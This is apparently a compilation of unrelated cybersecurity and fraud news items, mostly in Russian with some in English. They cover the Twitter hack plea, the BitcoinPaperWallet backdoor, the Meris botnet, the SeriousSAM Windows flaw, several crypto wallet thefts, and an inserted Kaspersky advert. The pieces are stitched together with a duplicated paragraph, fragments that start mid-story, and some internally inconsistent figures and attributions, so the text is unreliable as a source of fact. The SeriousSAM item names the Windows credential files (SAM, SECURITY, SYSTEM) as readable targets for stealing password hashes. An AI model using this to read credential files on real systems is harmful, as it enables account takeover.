On February 21, 2021, a National Cyber Security Coordinator (NCSC) official, Lt. Gen. Rajesh Pant had [told](https://www.thehindu.com/sci- tech/technology/indias-cyber-defenses-breached-and-reported-govt-yet-to-fix- it/article33888110.ece) Hindustan Times :
“Remedial actions have been taken by NCIIPC (National Critical Information Infrastructure Protection Centre) and Cert-IN (Indian Computer Emergency Response Team)… NCIIPC handles only the Critical Information Infrastructure issues. In this case, the balance pertained to other states and departments that were immediately informed by Cert-IN. It is likely that some action may be pending by users at state levels which we are checking.”
To prevent threat actors from exploiting these vulnerabilities, the researchers had not released the complete writeup on how exactly they had exploited the government systems, until today.
"After working with the NSCS, we have been given the green-light to disclose more specific details and all 34-pages of our reported vulnerabilities have been adequately remediated," said researchers in their [detailed report released today](https://johnjhacking.com/blog/indian-government-breach- disclosure/).
This is not the first time web servers have exposed files that should remain forbidden from the public eye.
Previously, Sakura Samurai group had breached the United Nations on finding exposed Git credential files on UN-owned domains.
The researchers could use these credentials to access over 100K UNEP employee records.
Last month, BleepingComputer had also reported on an Azure bucket leaking hundreds of passports and identity documents of prominent journalists and volleyball players from around the world.
When deploying web services, organizations should ensure that proper file permissions are configured and verify if sensitive assets can be accessed publicly.
A Florida teenager has pleaded guilty to fraud charges after coordinating the hack of high-profile Twitter accounts to run a cryptocurrency scam that collected roughly $120,000 worth of bitcoins.
Graham Ivan Clark was charged last year as an adult in July 2020, he turned 18
in January 2021, as the first suspect and the one who orchestrated last year's
Twitter hack.
arrested following an operation coordinated by the FBI, the IRS, and the
Secret Service (court documents available
[here](https://www.documentcloud.org/documents/20515611-clark-information-
redacted)).
The other individuals indicted for their involvement in the attack are Mason
Sheppard (Chaewon) from Bognor Regis, United Kingdom, and Nima Fazeli (Rolex)
from Orlando, Florida. (criminal complaints available here and here).
arrested following an operation coordinated by the FBI, the IRS, and the
Secret Service (court documents available
[here](https://www.documentcloud.org/documents/20515611-clark-information-
redacted)).
The other individuals indicted for their involvement in the attack are Mason
Sheppard (Chaewon) from Bognor Regis, United Kingdom, and Nima Fazeli (Rolex)
from Orlando, Florida. (criminal complaints available here and here).
Using credentials of Twitter employees with access to internal support tools,
they targeted 130 high-profile accounts, accessing the direct messages of 36
(including the inbox of Dutch Member of House of Representatives Geert
Wilders), eventually downloading the Twitter Data for seven accounts.
He also sold access to those accounts and, later, used the high-profile and verified Twitter accounts to run a cryptocurrency scam on the social network's platform.
The Twitter accounts of tech companies ( and @Uber), crypto exchanges (@coinbase, , and @binance), tech executives, celebrities, and politicians (@JeffBezos, @BarackObama, @elon_musk, @kanyewest, @JoeBiden, @BillGates, and @WarrenBuffett) were some of the 130 used by the hackers to promote their Bitcoin scam.
Hijacked Twitter
accounts used to push the Bitcoin scam
Clark agreed on Tuesday to be sentenced as a youthful offender to three years
in prison, followed by three years of probation.
According to the [agreement](https://www.documentcloud.org/documents/20515610-plea-agreement- acknowledgment-of-waiver-of-rights-bc-6f018852-673e-4df1-85da-4c5629856265), Clark pled guilty to multiple counts of organized fraud, communications fraud, fraudulent use of personal information, and access computer without authority, as follows:
"The seven-and-a-half months Clark has already spent behind bars will be applied toward his three years of incarceration," according to a [press release](https://www.sao13th.com/2021/03/prosecutors-reach-plea-agreement-in- case-of-twitter-hacker-graham-clark/) from the Hillsborough State Attorney’s Office.
"Along with his probation, this means Clark will remain under supervision until the middle of 2026, when he will be 23 years old."
David T. Weisbrod, Clark's defense attorney, also confirmed in the plea agreement signed on March 12th that "all Bitcoin acquired from the charged offenses" was returned to law enforcement.
"He took over the accounts of famous people, but the money he stole came from regular, hard-working people," Hillsborough State Attorney Andrew Warren [said](https://www.sao13th.com/2021/03/prosecutors-reach-plea-agreement-in- case-of-twitter-hacker-graham-clark/) in a statement published on Tuesday. "Graham Clark needs to be held accountable for that crime, and other potential scammers out there need to see the consequences."
"In this case, we’ve been able to deliver those consequences while recognizing that our goal with any child, whenever possible, is to have them learn their lesson without destroying their future."
На популярном сайте для «бумажных кошельков» BitcoinPaperWallet.com обнаружен бэкдор. При создании кошелька закрытые ключи попадали в руки злоумышленников, в результате пользователи потеряли более 124 BTC.
Бумажные кошельки для биткоина — это способ «холодного» хранения криптовалюты. Пользователь просто распечатывает открытый и закрытый ключи и может переводить на этот кошелек биткоины для хранения.
Как оказалось, достаточно популярный сайт для генерации бумажных кошельков BitcoinPaperWallet.com оказался уязвимым для внедрения бэкдора, благодаря чему злоумышленники получили доступ к закрытым ключам как минимум некоторых из созданных пользователями кошельков. После поступления биткоинов на эти кошельки хакеры мгновенно их воруют.
Специалисты по компьютерной безопасности рассказали об уязвимости: обычно, при создании кошелька пользователь должен совершать движения мышкой для генерирования случайного ключа. Однако на сайте BitcoinPaperWallet.com злоумышленниками был внедрен метод под названием «test_keys» — при создании генерировалось несколько тестовых ключей, сохраненных на сервере. При завершении создания использовался один из этих ключей, а не сгенерированный пользователем случайный ключ. И у хакеров имелся доступ к этим тестовым ключам.
При этом в оригинальном коде BitcoinPaperWallet, выложенном создателем на портал GitHub, такого метода нет. Соответственно, кто-то специально «модернизировал» код для похищения ключей от кошельков пользователей.
7 января пользователь BitcoinPaperWallet.com под псевдонимом «Nick Wendell» потерял 14.5 BTC. Он создал бумажный кошелек и перевел на него биткоины, но уже через несколько минут они были похищены. Впоследствии биткоины оказались на бирже Binance. По текущему курсу это более $700 000.
«Уже через минуту я понял, что произошло. У меня было чувство, что я падаю с высоты и никак не достигну дна. Помню, я ходил кругами по кухне в шоке», — написал пользователь.
Отметим, что расширение MetaMask для популярных браузеров определяет сайт BitcoinPaperWallet.com как фишинговый и предупреждает о этом пользователя.
«Критически важно, чтобы создание кошелька проходило с помощью доверенного ПО и полностью оффлайн. Важно помнить, что в случае потери закрытого ключа злоумышленники смогут украсть все ваши накопления», — подчеркнул независимый разработчик Биткоина Дастин Деттмер (Dustin Dettmer).
Нигерийский злоумышленник рассылал электронные письма различным пользователям, предлагая получателям $1 млн за установку вымогательского ПО Demonware на серверах компаний.
Demonware (также известное как Black Kingdom) — вымогательское ПО с открытым исходным кодом, доступное на GitHub. По словам экспертов, данный вымогатель обычно распространяется злоумышленниками, не обладающими особыми техническими навыками.
Большое количество сообщений было отправлено на адреса электронной почты, защищенные облачной платформой безопасности Abnormal Security, что привлекло внимание специалистов по безопасности компании.
Исследователи ответили на приглашение злоумышленника пообщаться в чате, представившись сотрудником, который хочет немного заработать. Мошенник отправил две ссылки для загрузки исполняемого файла вымогателя и предложил продолжить разговор в мессенджере Telegram, давая представление о своей мотивации и технических способностях. По мере продолжения беседы преступник продолжал снижать сумму требуемого выкупа до $250 тыс., а затем до $120 тыс. Это было явным признаком того, что преступник не знаком с тактиками вымогательских группировок.
По словам мошенника, с помощью вымогательского ПО он решил профинансировать свой стартап социальной сети под названием Sociogram, где он выступал в качестве генерального директора. Как утверждал злоумышленник, он владел стартапом и находился в Нигерии, и даже поделился своим профилем в LinkedIn. Киберпреступник прибег к использованию программы-вымогателя после безуспешной попытки взломать учетные записи электронной почты с помощью фишинга.
• Source: <https://abnormalsecurity.com/blog/nigerian-ransomware-soliciting- employees-demonware/>
Названный Mēris, латышское слово означает «чума», ботнет в основном использовался в рамках кампании вымогательства DDoS против интернет- провайдеров и финансовых организаций в нескольких странах, таких как Россия, Великобритания, США и Новая Зеландия.
Группа, стоящая за ботнетом, обычно отправляет опасные электронные письма крупным компаниям с просьбой о выкупе. Электронные письма, которые нацелены на компании с обширной онлайн-инфраструктурой и которые не могут позволить себе простои, содержат угрозы отключить важные серверы, если группе не будет выплачено определенное количество криптовалюты к установленному сроку.
Если жертвы не платят, хакеры вначале запускают свои бот-сети в более мелкие атаки, которые со временем существенно увеличиваются в размерах, чтобы оказать давление на жертв.
**
Мерис - «ботнет нового типа»**
Qrator Labs, российская служба защиты от DDoS-атак, описала Meris как «ботнет нового типа» в опубликованном сегодня блоге после серии атак на российские компании.
«За последние пару недель мы стали свидетелями разрушительных атак на Новую Зеландию, США и Россию, которые мы все приписываем этому виду ботнетов», - заявили сегодня исследователи компании.
«[Meris] может перегрузить практически любую инфраструктуру, включая некоторые высоконадежные сети. Все это связано с огромной мощностью RPS, которую он приносит », - заявила компания, где RPS означает количество запросов в секунду, один из двух способов измерения размера DDoS-атак [другой - Гбит / с, гигабайты в секунду].
Причина, по которой Qrator Labs называет Meris единственной в своем роде, заключается в том, что до этого лета большинство DDoS-атак на основе RPS были очень редкими и не наблюдались в таком масштабе в течение последних пяти лет.
Большинство ботнетов обычно настроены на передачу как можно большего количества нежелательного трафика на цель в классических «атаках на полосу пропускания», которые измеряются в Гбит / с.
Атаки RPS, называемые объемными или DDoS-атаками на уровне приложений, отличаются, поскольку злоумышленники сосредотачиваются на отправке запросов на целевой сервер, чтобы перегружать его ЦП и память. Вместо того, чтобы забивать пропускную способность нежелательным трафиком, объемные атаки фокусируются на захвате ресурсов серверов и, в конечном итоге, их сбое.
«За последние пять лет практически не было атак глобального масштаба на уровне приложений», - сказал Qrator.
Ботнет дважды бьет рекорды DDoS
Но все изменилось этим летом с появлением Meris, который был построен на модифицированной версии старого вредоносного ПО Mirai DDoS, согласно компании Cloudflare, занимающейся интернет-инфраструктурой, которой также приходилось иметь дело с некоторыми из своих атак.
Но вместо того, чтобы сосредоточиться на атаках с пропускной способностью, как большинство вариантов Mirai, Мерис сосредоточился на модулях, специализирующихся на запуске объемных атак, и, по-видимому, они нашли золотую середину.
После недавних атак Meris дважды побила рекорд по объему самой крупной DDoS- атаки. Он сделал это в первый раз ранее этим летом, в июне, когда стоял за крупной DDoS-атакой на 17,2 миллиона RPS, которая, по словам Cloudflare, поразила американскую финансовую компанию, перед которой стояла неприятная задача смягчить эту конкретную атаку.
Сегодня Qrator Labs заявила, что Meris снова превзошла сама себя во время атаки, произошедшей в воскресенье, 5 сентября, которая достигла еще более крупного рубежа - 21,8 миллиона запросов в секунду.
Qrator заявил, что работал с Яндексом, чтобы смягчить атаку, которая, по всей видимости, поражала серверы Яндекса. Но источник, причастный к инциденту, сообщил The Record, что целью атаки на самом деле был российский банк, который держал свой портал электронного банкинга на облачном хостинге Яндекса.
Ботнет в основном состоит из скомпрометированных устройств MikroTik.
Qrator сообщает, что после анализа источника большей части трафика атак большая часть его вернулась к устройствам MikroTik, небольшой латвийской компании, которая продает сетевое оборудование, такое как маршрутизаторы, шлюзы IoT, точки доступа Wi-Fi, коммутаторы и оборудование для мобильных сетей.
Компания заявила, что не смогла определить, обнаружил ли злоумышленник и применил оружие нулевого дня в программном обеспечении MikroTik, или они просто пережили прошлые эксплойты.
Тем не менее, похоже, что наступает «нулевой день», просто из-за большого количества устройств MikroTik, которые, по-видимому, были порабощены гигантской сеткой Месира, насчитывающей 250 000 человек.
Представитель MikroTik не ответил на запрос о комментарии относительно отчета Qrator.
Но помимо отражения объемных (на уровне приложений) DDoS-атак, Meris также выделяется своими размерами. В последние годы DDoS-ботнеты редко достигают 50 000 зараженных устройств.
Это произошло потому, что код нескольких вредоносных программ DDoS был опубликован в Интернете много лет назад, в том числе Mirai, и этот код широко использовался для создания множества ботнетов, которые в конечном итоге боролись друг с другом из-за ограниченного числа устройств, которые они могли заразить, с очень немногими. ботнеты достигли даже небольших цифр в 15 000 за последние несколько лет, не говоря уже о цифре 250 000, невиданной с конца 2018 года.
В целом, то, что операторы Meris достигли за последние несколько месяцев, можно считать впечатляющим с технической точки зрения, но мы также говорим о банде киберпреступников, поэтому ожидайте длинный список технических сбоев в ближайшие месяцы, поскольку Операторы Meris продолжают использовать свою новую игрушку для вымогательства и DDoS-атак.
Источник: <https://therecord.media/meet-meris-the-new-250000-strong-ddos- botnet-terrorizing-the-internet/>
В американском Кливленде (штат Огайо) судят китайца, воспользовавшегося своим доступом к счетам клиентов-пенсионеров. В банке, название которого власти скрывают, 34-летний Юэ Цао работал аналитиком по качественному моделированию.
Согласно обвинительному заключению, Цао обокрал четырех пожилых людей и использовал персональные данные человека, умершего в 2020 году, для кражи 2,1 миллиона долларов. Ему предъявили обвинения в банковском мошенничестве, краже личных данных при отягчающих обстоятельствах и денежных операциях с имуществом, полученным преступным путем. В компании Цао работал с 2015 года, а преступления совершал в 2022-м и 2023 годах.
Во время слушаний он периодически начинал рыдать и настаивал на своей невиновности с помощью переводчика. При этом в ходе слушаний он оставался на свободе благодаря внесенному залогу в 20 тысяч долларов. Приговор по этому делу пока не вынесен.
msn.com/en-us/money/companies/cleveland-area-bank-employee-accused-of- pilfering-21-million-from-elderly-customers-accounts/ar-BB1oB571
Компании торгуются с киберпреступниками, чтобы снизить сумму выкупа.
В мае специалист по борьбе с вымогателями (переговорщик), работающий в европейской производственной компании, получил неожиданное сообщение в чате от злоумышленника, взломавшего клиента специалиста.
Переговоры о выкупе — это область, в которой доминируют юристы, ИБ-компании и консультанты, хорошо разбирающиеся в работе с хакерскими группами. Специалистов нанимают организации для проведения переговоров со злоумышленниками с целью смягчения их требований. Согласно исследованию Palo Alto Networks , выкупы вымогателям выросли в среднем до $2,2 млн. в 2021 году, что в 2 раза больше 2021 года. По данным Palo Alto Networks, жертвы обычно платят менее половины суммы выкупа (около $541 тыс).
Переговорщик поделился информацией с журналистами на условиях анонимности, поскольку он не уполномочен обсуждать инцидент. Эксперт помогает пострадавшим от вымогателей компаниям торговаться с хакерами, чтобы снизить сумму выкупа.
После того, как переговорщик сторговал выкуп хакеров на несколько десятков тысяч долларов, хакеры занервничали и потребовали копию контракта переговорщика с компанией в качестве доказательства законности работы специалиста. Мошенники заявили, что боятся быть обманутыми. «Нам нужно знать, что вы честны с нами», — написали хакеры специалисту.
«Злоумышленники боялись, что я возьму с моего клиента дополнительную сумму сверх суммы выкупа», — сказал эксперт.
Затем хакеры сделали смелое предложение: они предложили переговорщику доступ к базе данных других компаний, чтобы он мог оказать свои услуги новым клиентам. Взамен киберпреступники предложили платить им комиссию с каждого выкупа, но специалист отклонил предложение.
По словам специалиста, хакеры являются участниками группировки Haron . Эта группа стала известна после того, как кибератака на Colonial Pipeline нарушила поставки бензина в США и привела к арестам участников хакерских групп, связанных с Россией .
source: unit42.paloaltonetworks.com/2022-ransomware-threat-report-highlights
В минувшие выходные ИБ-исследователь Йонас Ликкегаард (Jonas Lykkegaard) сообщил, что все версии Windows 10, выпущенные за последние 2,5 года (а также Windows 11) уязвимы перед проблемой, получившей названия SeriousSAM и HiveNightmare. Благодаря этому багу, злоумышленник может повысить свои привилегии и получить доступ к паролям от учетных записей пользователей.
yarh- for some reason on win11 the SAM file now is READ for users.
So if you have shadowvolumes enabled you can read the sam file like this:
I dont know the full extent of the issue yet, but its too many to not be a problem I think. pic.twitter.com/kl8gQ1FjFt
— Jonas L (@jonasLyk) July 19, 2021Click to expand...
Уязвимость связана с тем, как Windows 10 контролирует доступ к таким файлам,
как SAM, SECURITY и SYSTEM:
C:\Windows\System32\config\sam
C:\Windows\System32\config\security
C:\Windows\System32\config\system
Напомню, что в этих файлах хранится такая информация, как хешированные пароли
всех учетных записей пользователей Windows, параметры, связанные с
безопасностью, данные о ключах шифрования и прочие важные сведения о
конфигурации ядра ОС. Если потенциальный злоумышленник сможет прочитать файлы,
полученная информация поможет ему получить доступ к паролям пользователей и
критически важным настройкам системы.
В нормальной ситуации только администратор Windows может взаимодействовать с
этими файлами. Однако во время тестирования Windows 11 эксперт заметил, что
хотя ОС ограничивает доступ с этим файлам для низкоуровневых пользователей,
доступные копии файлов сохраняются в теневых копиях. Причем, как оказалось,
эта проблема появилась в коде Windows 10 еще в 2018 году, после релиза версии
1809.
Получение доступа к файлу конфигурации [Security Account
Manager](https://docs.microsoft.com/en-us/windows/security/threat-
protection/auditing/audit-sam) (SAM) всегда представляет собой огромную
проблему, так как это позволяет похитить хешированные пароли, взломать эти
хэши и захватить учетные записи. Хуже того, в SYSTEM и SECURITY также могут
содержать аналогичные другие, не менее опасные данные, включая ключи
шифрования DPAPI и детали
Machine Account (используются для
присоединения компьютеров к Active Directory). Ниже можно увидеть демонстрацию
такой атаки, записанную создателем Mimikatz Бенджамином Делпи.
Q: what can you do when you have #mimikatz? & some Read access on Windows system files like SYSTEM, SAM and SECURITY?
A: Local Privilege Escalation ?
Thank you @jonasLyk for this Read access on default Windows? pic.twitter.com/6Y8kGmdCsp
— ? Benjamin Delpy (@gentilkiwi) July 20, 2021Click to expand...
Microsoft уже [признала](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-36934) наличие проблемы, которой был присвоен идентификатор [CVE-2021-36934](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-36934).
«Уязвимость, связанная с повышением привилегий, работает из-за избыточных разрешений списков контроля доступа (Access Control Lists, ACL) для нескольких системных файлов, включая базу данных Security Accounts Manager (SAM).
[После успешной атаки] злоумышленник сможет устанавливать программы, просматривать, изменять или удалять данные, создавать новые учетные записи с полными пользовательскими правами. Чтобы воспользоваться уязвимостью, атакующий должен иметь возможность выполнить код в системе жертвы», — пишут представители Microsoft.Click to expand...
Пока Microsoft только изучает проблему и работает над созданием патчем,
который, вероятнее всего, будет выпущен как экстренное обновление безопасности
позже на этой неделе. Пока в компании лишь рекомендуют ограничить доступ к
проблемной папке, а также удалить теневые копии.
Стоит отметить, что известный ИБ-эксперт Кевин Бомонт уже опубликовал PoC-
эксплоит для SeriousSAM, чтобы
админы могли проверить, какие из их систем уязвимы для атак.
Источник: https://xakep.ru/2021/07/21/serioussam/
Нативный токен блокчейна Holograph упал на 80% после того, как злоумышленник взломал смарт-контракт оператора протокола и выпустил 1 млрд HLG на сумму $14,4 млн.
14 июня команда сети подтвердила атаку и сообщила об исправлении ошибки. Проект также обратился к централизованным биржам и правоохранительным органам для заморозки украденных активов.
__https://twitter.com/x/status/1801332482262110301
По данным Etherscan, хакер выпустил 1 млрд HLG в ходе девяти транзакций. Первую партию он запустил 13 июня около 10:00 (МСК/Киев).
Спустя 10 минут токен начал падать, обрушившись с $0,014 до $0,002. На момент написания монета восстановилась до $0,006.
При текущем курсе 1 млрд HLG оценивается примерно в $6,8 млн. Однако хакер начал конвертировать свои созданные монеты в USDT спустя четыре часа после атаки.
Аналитик венчурной компании CMT Digital Мэтт Касто считает, что злоумышленник был «разработчиком-мошенником», который за 26 дней до инцидента профинансировал адрес получателя выпущенных HLG.
В одном умном городе что-то пошло не так. В системах сбои, техника отказывается работать, а периметр стал уязвим для атак… И только вы и ваши знания в информационной безопасности могут это остановить.
«Лаборатория Касперского» приглашает вас сыграть в «Миссию Мидори White Hat» на знание offensive и defensive. На пути вам будут встречаться герои, которые нуждаются в помощи. Ваша миссия — постараться решить их проблемы, применив свои ИБ-скилы: например, запентестить умное такси или провалидировать отчет о защищенности завода.
Активируйте свои скилы в инфобезе и покажите их в действии. Переходите по этой ссылке и попробуйте пройти миссию до конца.
Следственное подразделение УФСБ по Вологодской области расследовало уголовное дело 19-летнего уроженца Череповца. Ему вменяли ч. 2 ст. 273 УК РФ (использование компьютерных программ, заведомо предназначенных для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации и нейтрализации средств защиты компьютерной информации, совершенное из корыстной заинтересованности).
Как сообщает пресс-служба УФСБ региона, следствие и суд выяснили, что осенью 2022 года юноша с помощью знакомого, не знающего о его преступных намерениях, разместил на видеохостинге «YouTube» видеозапись, закрепив в разделе описания к ней ссылку на скачивание файла с вредоносной компьютерной программой. Пользователи этого видеохостинга, переходя по указанной ссылке, загружали файл, который вел несанкционированный сбор и передачу на управляющий сервер информации, хранящейся на зараженном устройстве. В том числе сведений о логинах, паролях, сетевых адресах пользователя, файлах криптовалютных кошельков.
Полученными сведениями череповчанин распоряжался по своему усмотрению. Для получения дополнительного заработка он продавал аккаунты пользователей интернета, логины и пароли к которым получил при помощи вредоносного программного обеспечения.
Юноша признал вину, помог следствию и попросил рассмотреть дело в особом порядке. С учетом всего этого Череповецкий городской суд назначил ему 1 год лишения свободы условно с тем же испытательным сроком. Компьютерная техника как орудие преступления конфискована в доход государства. Приговор вступил в силу.
Статья 273 УК РФ предусматривает до 4 лет ограничения свободы, до 5 лет принудительных работ, значительные денежные штрафы или до 7 лет лишения свободы.
В Москве мужчина обманул сотрудника банка: тот поверил, что банкомат не выдал клиенту деньги и перевел ему на карту 200 тысяч.
38-летний житель Подмосковья провернул выгодный спектакль в банке на Совхозной улице: он сделал вид, что снимает деньги в банкомате, с этого же места позвонил в техподдержку банка с жалобой, что терминал сломался и не выдал ему купюры.
Оператор поверил в историю и перевел ему 200 тысяч рублей на карту. Потом выяснилось, что всё было постановкой. Мужчину задержали, возбуждено дело по статье «Мошенничество».
Сотрудники криминальной полиции ГУНП в Закарпатской области пресекли преступную деятельность масштабного мошеннического колл-центра. Организатором схемы является киевлянин, который для совершения преступления обустроил в Ужгороде офис и привлек к противоправной деятельности около 20 фигурантов.
В частности, свою жену, которая отвечала за подбор кадров, специалиста по ИТ технологиям, который занимался выводом средств из предприятия, днепрянина, который был фактически его «правой рукой» в этой схеме, и полиграфолога, который с помощью технических средств осуществлял проверку потенциальных сотрудников. Это делалось с целью избежания возможной утечки информации и попадания в их преступный круг лиц, которые могли бы сотрудничать с правоохранительными органами.
Остальные фигуранты работали операторами, то есть совершали звонки гражданам и предлагали криптовалюту на продажу. К ним были особые требования - знание иностранных языков, таких как чешский, польский, венгерский и словацкий. Поскольку преимущественно потерпели от действий этих мошенников жители соседних европейских стран, в том числе переселенцы из Украины.
Закарпатские полицейские провели спецоперацию и, при силовой поддержке бойцов КОРДа, задержали организатора в Киеве. Задержаны и двое его сообщников - днепрянин и специалист по ИТ из Львова. Все они сейчас находятся в изоляторе временного содержания на территории Закарпатской области.
Также правоохранители провели ряд обысков в разных регионах страны, где организатор владеет недвижимым имуществом. В частности в Киеве и Виннице. Обыски провели и по месту жительства других фигурантов дела и непосредственно в помещении колл-центра.
Полицейские изъяли всю компьютерную технику злоумышленников, документы, наличные в сумме почти 80 тысяч долларов США и карточки с остальными незаконно полученными деньгами. Также изъяты и дорогостоящие автомобили подозреваемых: «Hyundai Sonata» и три новые модели «BMW».
Сейчас оперативники устанавливают перечень всех потерпевших от такой преступной деятельности, на сегодняшний день наибольшая установленная сумма, которую выманили злоумышленники от одного человека, составляет 60 тысяч американских долларов.
Следователи Ужгородского районного управления полиции, при процессуальном руководстве группы прокуроров Ужгородской окружной и Закарпатской областной прокуратуры, по данному факту открыли уголовное производство по ч. 4 ст. 190 Уголовного кодекса Украины, то есть Мошенничество, совершенное в особо крупных размерах организованной группой. По этой статье сообщено о подозрении четырем ключевым лицам преступной схемы - владельцу преступного бизнеса, его жене, его доверенному лицу и ИТ-специалисту. Организатору также инкриминируют ч. 3 ст. 190 УКУ, то есть Мошенничество, совершенное в крупных размерах, или путем незаконных операций с использованием электронно-вычислительной техники.
Правоохранители Закарпатья обращают внимание, что лица, которые также пострадали от действий этих злоумышленников, могут обращаться с соответствующими заявлениями в полицию.
За содеянное мошенникам грозит от 5 до 12 лет заключения с конфискацией имущества.
Андрей Шумейко, также известный под псевдонимами YRH04E и JVHResearch, больше года предоставлял Apple информацию об утечках данных и взломах, а также выступал в роли информатора компании.
В Twitter и каналах Discord для узкого круга лиц, торгующих утекшей информацией и украденными прототипами, Шумейко рекламировал утекшие приложения, руководства и украденные устройства. Но без ведома других членов сообщества он также делился с Apple личной информацией о людях, которые продавали украденные прототипы iPhone из Китая, о сотрудниках Apple, осуществлявших «слив» данных, о журналистах, связанных с продавцами. Об этом сообщило издание Vice Motherboard.
Андрей Шумейко решил поделиться своей историей, поскольку Apple якобы воспользовалась им и должна была компенсировать ему за предоставление компании этой информации. Шумейко установил отношения с командой Global Security по борьбе с утечками после того, как предупредил их о потенциальной фишинговой кампании против некоторых сотрудников Apple Store в 2017 году. Затем, в середине 2020 года, он попытался помочь Apple в расследовании одной из утечек данных и, как он выразился, стал «кротом».
15 мая прошлого года Шумейко связался с Apple Global Security по электронной почте, и предоставил информацию о человеке, который якобы купил iPhone 11 со сборкой для разработки iOS 14, исследователях безопасности, получивших утекшие копии операционной системы, и нескольких людях, продающих в Китае прототипы iPhone и другие устройства с заводов в Шэньчжэне.
В прошлом году Шумейко отправил специалистам Apple PDF-файл под названием «Список», содержащий номера телефонов, идентификаторы WeChat и предполагаемое местонахождение трех человек, которые незаконно рекламировали и продавали устройства Apple в Twitter, а также гражданина США, собирающего прототипы iPhone.
По словам инсайдера, он надеялся получить финансовое вознаграждение за публикацию секретных данных и выдачу информаторов. Шумейко неоднократно спрашивал у сотрудников Apple, может ли компания ему заплатить, но каждый раз работники уклонялись от ответа, и теперь он чувствует себя обманутым.
Взлом некастодиального кошелька Blender Wallet 22 июня может с большой долей вероятности оказаться инсайдерской атакой. Такое предположение сделали опрошенные ForkLog эксперты.
На сайте Blender Wallet сказано, что для компенсации средств им требуются сид- фразы пользователей, хотя некастодиальные кошельки архитектурно не могут и не должны иметь к ним доступа.
Директор по развитию продукта Crystal Blockchain Кирилл Чихрадзе рассказал, что их команде удалось определить несколько сервисных кошельков Blender Wallet и миксера Blender.io, через которые с начала 2019 года суммарно прошло около 70 BTC, что ставит под сомнение заявленную сумму ущерба в 100 BTC.
«Пока сложно сказать, как именно могла произойти заявленная атака. Возможно, способом похожим на атаку Electrum в 2019 году. Однако запрос предоставить сид-фразу и пароль для восстановления средств должен вызывать подозрение», – отметил он.
Неясным остается и то, как команда сервиса подсчитала потери в результате взлома. Исследователь консенсус-протоколов Андрей Соболь в комментарии ForkLog заявил, что операторы Blender Wallet могли узнать сумму ущерба, если все запросы шли через их API.
«То есть когда пользователь регистрировал новый кошелек, то его сет публичных адресов отправлялся на сервер», – предположил он.
По его словам, такая механика используется во многих некастодиальных решениях.
«На самом деле тут альтернатива – какая-нибудь децентрализованная сеть из нод. Что-то похожее у Electrum, но из-за этого он тормозит. Тут признак такой – если кошелек работает стабильно и нормально в плане обновления информации о новых транзакциях, значит у владельца сервиса есть своя выделенная инфраструктура», – объяснил Соболь.
Теоретически существуют случаи, при которых отправка приватного ключа может являться обязательным условием для компенсации, продолжает эксперт:
«Может быть они боятся, что случайные люди начнут выдавать себя за владельцев чужих кошельков. Если предположить, что они не мошенники, – они могут просить сид-фразу в качестве 100% идентификации».
Соболь указал, что компания могла бы попросить пользователей подписать приватным ключом какое-то сообщение, но для этого в кошелек должна быть встроена функция подписи. В противном случае – проще было запросить сид-фразу.
«Не исключаю, что хакеры попытаются украсть деньги дважды. Сначала с кошельков, а затем, зная приватный ключ, попросят от владельцев рефанд», – добавил Андрей Соболь.
По мнению СТО Trustee Wallet Ксении Житомирской, сейчас инцидент в целом выглядит как инсайдерский взлом:
«Скорее всего, был внедрен код внутри приложения, использующий средства пользователя без его ведома. Это бы объяснило отключение функции Replace-By- Fee (RBF) в интерфейсе. Если бы слили мнемонические фразы, то через любой кошелек бы вывели», – заявила она в комментарии ForkLog.
Эксперт указала, что в случае экзит-скама команда похитила бы все деньги.
Житомирская предположила, что требования предоставить сид-фразу могло быть продиктовано тем, что команда Blender Wallet отслеживает по ней публичный адрес и подтверждает владение им.
«Они просто хотят собрать адреса пользователей, которые заявят о возмещении средств. Тем, кто побоится присылать, просто не компенсируют. Иначе бы всем пришлось компенсировать по логам, раз они увидели отправки похитителей».
В целом требования предоставить сиды и пароли являются чрезмерными, подчеркнула CTO Trustee Wallet.
Среди вероятных причин взлома некастодиальных кошельков Ксения Житомирская назвала неаккуратность ведения логов, открытое хранение сид-фраз, автоматическое заполнение паролей и классические вирусы-перехватчики.
«Помимо этого, не все некастодианы на самом деле являются некастодианами, но это можно отнести к внедрению вредоносного кода. Поэтому так важен аудит кода», – добавила она.
Житомирская не смогла найти исходный код Blender Wallet. В тематической ветке, посвященной кошельку на форуме BitcoinTalk, в мае 2021 года представители проекта написали, что «решили не открывать исходный код».
Эксперт по кибербезопасности Security Services Group Юрий Мелащенко предупреждает о потенциальной опасности анонимных проектов.
«С самого начала проект анонимный и приватный, невозможно установить, кто владеет этой почтой и джаббером. Если вы пользуетесь миксерами, то должны быть понимать, что написать запрос в полицию или на кого-то пожаловаться вряд ли получится. Изначально проект занимается темными делами и взывать к какой-то справедливости в этом случае даже глупо».
Он отметил, что доступ к серверу или к хостингу имеют либо владельцы, либо хакеры, которые могут поменять код на сайте.
«Возможно, с самого начала приватные ключи были недоступны, но после того, как хакеры взломали хостинг, поменяли главную страницу и код, они получили к ним доступ», – предположил эксперт.
Мелащенко подчеркнул, что если пользователей просят прислать сид-фразы, это означает что ни о какой некастодиальности речи быть не может.
«Любой сервис некастодиальных кошельков доступа к приватных ключам архитектурно не имеет. Я бы ни в коем случае сид-фразу не отправлял, а попробовал бы вбить ее в другом кошельке и проверить баланс. Если видите, что все украдено, то тогда можно передать сид, но больше никогда не принимайте на этот кошелек средства».
По его словам, команда могла с таким же успехом запросить публичный ключ, а не сид-фразу, но, видимо, пользователям не объяснили, где его сгенерировать или посмотреть.
CTO Trustee Wallet Ксения Житомирская также утверждает, что без исходного кода, делать какие-то выводы сложно.
«В веб-приложении, например Metamask, мнемонические фразы зашифрованы в хранилище, поэтому все упирается в разработчиков. Нужно искать код и разбираться, почему взломали не всех и от чего это зависело: возможно только тех, кто был активным последние дни или, например, обновил версию», – отметила она.
Человек, называющий себя представителем Blender Wallet, в комментарии ForkLog настаивают на том, что команда не может установить принадлежность кошельков без сид-фраз, поскольку они не хранят никаких данных о пользователях.
Сумму ущерба в Blender Wallet посчитали с учетом того, «какие адреса были сгенерированы в нашем кошельке и баланс по ним».
Житомирская указывает, что для доступа к балансу на адресах достаточно публичного ключа:
«Если они требуют сид-фразу, то сами себе противоречат. Баланс адреса они могут видеть после того, как его получат. Но трекали ли они их до взлома, я не знаю, – для этого нужен исходный код».
